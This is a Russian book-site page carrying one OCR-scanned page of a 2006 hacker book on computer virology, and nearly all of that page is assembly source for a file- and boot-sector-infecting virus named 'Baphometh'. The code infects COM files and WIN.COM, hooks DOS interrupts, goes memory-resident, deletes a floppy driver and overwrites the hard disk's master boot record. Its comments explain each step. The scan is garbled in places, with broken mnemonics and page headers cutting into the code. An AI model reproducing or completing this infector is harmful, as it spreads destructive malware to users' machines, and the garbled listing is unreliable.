Книги
чёрным по белому
Главное меню
Главная О нас Добавить материал Поиск по сайту Карта книг Карта сайта
Книги
Археология Архитектура Бизнес Биология Ветеринария Военная промышленность География Геология Гороскоп Дизайн Журналы Инженерия Информационные ресурсы Искусство История Компьютерная литература Криптология Кулинария Культура Лингвистика Математика Медицина Менеджмент Металлургия Минералогия Музыка Научная литература Нумизматика Образование Охота Педагогика Политика Промышленные производства Психология Путеводители Религия Рыбалка Садоводство Саморазвитие Семиотика Социология Спорт Столярное дело Строительство Техника Туризм Фантастика Физика Футурология Химия Художественная литература Экология Экономика Электроника Энергетика Этика Юриспруденция
Новые книги
Цуканов Б.И. "Время в психике человека" (Медицина)

Суворов С. "Танк Т-64. Первенец танков 2-го поколения " (Военная промышленность)

Нестеров В.А. "Основы проэктирования ракет класса воздух- воздух и авиационных катапульных установок для них" (Военная промышленность)

Фогль Б. "101 вопрос, который задала бы ваша кошка своему ветеринару если бы умела говорить" (Ветеринария)

Яблоков Н.П. "Криминалистика" (Юриспруденция)
Реклама

Азбука хакера 3. Компьютерная вирусология - Собейкис В.Г.

Собейкис В.Г. Азбука хакера 3. Компьютерная вирусология — М.: Майор, 2006. — 512 c.
ISBN 5-98551-013-1
Скачать (прямая ссылка): hakeriazbukahakera2006.djvu
Предыдущая << 1 .. 72 73 74 75 76 77 < 78 > 79 80 81 82 83 84 .. 123 >> Следующая

push ах стандартная проверка на СОМ-инфекцию
sub ах, (EndOfBaphometh - RleEntryPoint) + 3 cmp ax,word ptr
cs:[Header+1] pop ax
jne ComReadyToBelnfected
OAA
Варфоломей Собейкис. АЗБУКА ХАКЕРА-3
jmp CloseFile ComReadyToBelnfected:
mov byte ptr cs:[WeAre] ,COM устанавливаем флаг WeAre на
;COM, чтобы
; вирус распознавал тип файла
sub ах,3 '.рассчитываем новый прыжок в начало файла
add ax.FileEntryPoint - StartOf Baphometh
mov word ptr cs: [NewJmp+1 ] ,ax
mov ax,4202h .ищем EOF - 2
movcx,-1
movdx,-2
int 21 h
mov ah,3fh ;читаем ENUNS (чексумма, используемая для lea dx,ENUNS ;СОМ-
файлов в Win9x/NT) mov cx,2 int 2lh
add word ptr cs:[ENUNS],EndOfBaphometh - StartOfBaphometh
; подстраиваем чексумму
mov word ptr cs:[ENUNS-5],'NF
mov word ptr cs:[ENUNS-3],'NU'
mov byte ptr cs:[ENUNS-1],'S'
mov ah ,40h '.крепим bapho к концу файла
lea dx,StartOfBaphometh
mov cx.EndOfBaphometh - StartOfBaphometh
int 21 h
mov ax,4200h ;переходим к началу,
xor cx.cx xor dx.dx
Ч1П
ГЛАВА 6. Инфицирование загрузочного сектора
int 21 h
mov ah,40h ;и записываем новый прыжок, который передаст
lea dx.NewJmp ; контроль вирусу, когда файл начнет выполняться
mov сх,3 int 21 h
CloseFile: mov ах,5701h pop dx cx int 21 h mov ah,3eh int 21 h FileError:
pop cx ds dx movax,4301h int 21 h xor ax,ax mov ds.ax
mov ax,word ptr cs:[Goodlnt24h] ;восстанавливаем обработчик
;int 24h
mov bx,word ptr cs: [Goodlnt24h+2] cli
mov word ptr ds:[24h*4],ax mov word ptr ds:[24h*4+2],bx sti
pop es ds popa
jmp Restorelnt21 h ;и выходим из подпрограммы ;инфицирования
восстанавливаем дату и время создания файла
закрываем файл
восстанавливаем атрибуты
01 1
Варфоломей Собейкис. АЗБУКА ХАКЕРА-3
FileEntryPoint: ;это точка входа, если выполняется
push ds es ;инфицированный файл
call Delta ;рассчитываем дельта-офсет
Delta:
pop bp
sub bp,offset Delta mov ax.ODEADh
int 21 h ;инсталляционный чек
cmp bx.OBCBCh jne GoTSR
jmp ManualMBRInfection
GoTSR: mov ax.ds dec ax
mov ds.ax ;ds = MCB
sub word ptr ds: [3] ,40h*4 ;уменьшаем размер блока памяти
;в МСВ и
sub word ptr ds:[12h],40h*4 ;PSP на 4KB xor ax,ax mov ds.ax
sub word ptr ds:[413h],4 ;вершина памяти уменьшается на 4KB
mov ax,word ptr ds:[413h]
shl ax,6
mov es.ax
pushes
popds
lea si, [bp+StartOfBaphometh] ;копируем вирус в
;свободную память
xor di.di
ГЛАВА 6. Инфицирование загрузочного сектора
mov cx.EndOf Baphometh - StartOf Baphometh rep movsb
Это мануальная подпрограмма инфицирования WIN.COM. Она используется по
той причине, что вирус не может инфицировать MBR, если зараженный файл
выполняется под Windows. Здесь мы сначала инфицируем WIN.COM, затем при
следующем выполнении WIN.COM вирус инфицирует MBR. Этот метод был улучшен
использованием ложного вызова прерывания 13h.
lea ах,[bp+ReturnHere] ;вирус прыгает к подпрограмме int 21 h
mov word ptr es:[Goodlnt21 h],ax ;при этом ah = 4BH,
;a ds:dx = C:\WINDOWS\WIN.COM
mov word ptr es:[Goodlnt21 h+2],cs;чтобы продолжить дальнейшее
mov word ptr cs:[bp+TSRVirusSegment],es дополнение кода, мы ;сначала
устанавливаем ложный адрес Goodlnt21h
mov ah,4bh ;ah = 4bh => выполняем функцию файла
lea dx,[bp+Win DotCom] ;C:\W1ND0WS\W1N.C0M
pusha
push ds es
db Oeah ;дальний прыжок
dwEvillnt21h ;к адресу Evillnt21h
TSRVirusSegment dw ? ;сегмент, в который копировался вирус
RetumHere: ;после того, как выполнялся зараженный win.com
pop es ds ' ;мы продолжаем здесь
рора
хог ах,ах
mov ds.ax
lea ax,Evillnt21 h '.перехват int 21 h
mov bx.es
cli
xchg ds:[21h*4],ax xchg ds:[21h*4+2],bx
Варфоломей Собейкис. АЗБУКА ХАКЕРА-3
mov word ptr es:[Goodlnt21h],ax mov word ptr es:[Goodlnt21 h+2],bx sti
ManualMBRInfbction: ;эта подпрограмма помещает копию вируса в push cs cs
;MBR вашего первого жесткого диска pop es ds
mov ah,41 h ;здесь мы удаляем 32-битный драйвер дискет
leadx,[bp+HsflopDotPdr] ;HSFLOP.PDR, чтобы инфицировать дискеты int 21 h
;когда они становятся доступными под Windows mov ах,0201 h ;читаем
оригинальную MBR
mov dx,80h movcx,1
lea bx,[bp+EndOf Baphometh] int 13h
lea bx,[bp+offset EndOfBaphometh] проверяем наличие
предыдущей инфекции
add bx,offset Marker cmp word ptr cs:[bx],'DT jne MBRNotYetlnfected jmp
Restore
MBRNotYetlnfected: сохраняем таблицу разделов в вирусе lea si, [bp+EndOf
Baphometh] add si,1BEh
lea di,[bp+PartitionTable] mov cx,40h rep movsb
mov ax,0301 h .сохраняем оригинальную MBR в секторе 2
ГЛАВА 6. Инфицирование загрузочного сектора
mov dx,80h mov сх,2
lea bx,[bp+EndOf Baphometh] int 13h
mov dx,80h ;переписываем MBR первой частью bapho
mov ax,0301 h
lea bx,[bp+StartOf Baphometh] mov cx, 1 int 13h
mov dx,80h ;и сохраняем остальную часть bapho в секторах
mov ax,0302h ;3 и 4
lea bx, [bp+StartOfBaphometh]
add bx,512
mov cx,3
int 13h
Restore:
cmp byte ptr cs:[bp+WeAre],EXE ;эта подпрограмма
; возвращает контроль
je RestoreEXE ;жертве и с помощью флага WeAre
проверяет, является ли выполняемый файл
;СОМ- или ЕХЕ-файлом
pop es ds
RestoreCom: ;простая подпрограмма COM-восстановления
Предыдущая << 1 .. 72 73 74 75 76 77 < 78 > 79 80 81 82 83 84 .. 123 >> Следующая